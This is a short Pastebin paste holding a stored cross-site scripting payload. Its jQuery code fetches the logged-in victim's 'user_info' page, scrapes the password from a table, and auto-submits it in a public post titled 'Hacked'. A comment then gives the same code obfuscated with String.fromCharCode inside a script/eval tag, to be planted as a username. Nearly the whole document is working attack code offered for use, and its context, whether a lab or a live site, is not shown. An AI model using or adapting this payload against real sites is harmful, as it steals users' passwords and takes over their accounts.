Guest User

Untitled

a guest
Dec 9th, 2018
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.58 KB | None | 0 0
  1. $.get(window.location.href + 'user_info', function(resp, a){
  2. var dom = $(resp);
  3. var password = $('table tr:eq(1) td', dom).text();
  4. var msg = 'My password is: '+ escape(password);
  5. $('#content').val( msg );
  6. $('#title').val('Hacked');
  7. $('#new_post').submit();
  8. });
  9.  
  10. // Now we can turn the above into numbers, and this becomes our username:
  11. // <script>eval(String.fromCharCode(36, 46, 103, 101, 116, 40, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 32, 43, 32, 39, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 114, 101, 115, 112, 44, 32, 97, 41, 123, 10, 32, 32, 118, 97, 114, 32, 100, 111, 109, 32, 61, 32, 36, 40, 114, 101, 115, 112, 41, 59, 10, 32, 32, 118, 97, 114, 32, 112, 97, 115, 115, 119, 111, 114, 100, 32, 61, 32, 36, 40, 39, 116, 97, 98, 108, 101, 32, 116, 114, 58, 101, 113, 40, 49, 41, 32, 116, 100, 39, 44, 32, 100, 111, 109, 41, 46, 116, 101, 120, 116, 40, 41, 59, 10, 32, 32, 118, 97, 114, 32, 109, 115, 103, 32, 61, 32, 39, 77, 121, 32, 112, 97, 115, 115, 119, 111, 114, 100, 32, 105, 115, 58, 32, 39, 43, 32, 101, 115, 99, 97, 112, 101, 40, 112, 97, 115, 115, 119, 111, 114, 100, 41, 59, 10, 32, 32, 36, 40, 39, 35, 99, 111, 110, 116, 101, 110, 116, 39, 41, 46, 118, 97, 108, 40, 32, 109, 115, 103, 32, 41, 59, 10, 32, 32, 36, 40, 39, 35, 116, 105, 116, 108, 101, 39, 41, 46, 118, 97, 108, 40, 39, 72, 97, 99, 107, 101, 100, 39, 41, 59, 10, 32, 32, 36, 40, 39, 35, 110, 101, 119, 95, 112, 111, 115, 116, 39, 41, 46, 115, 117, 98, 109, 105, 116, 40, 41, 59, 10, 125, 41, 59));</script>
Add Comment
Please, Sign In to add comment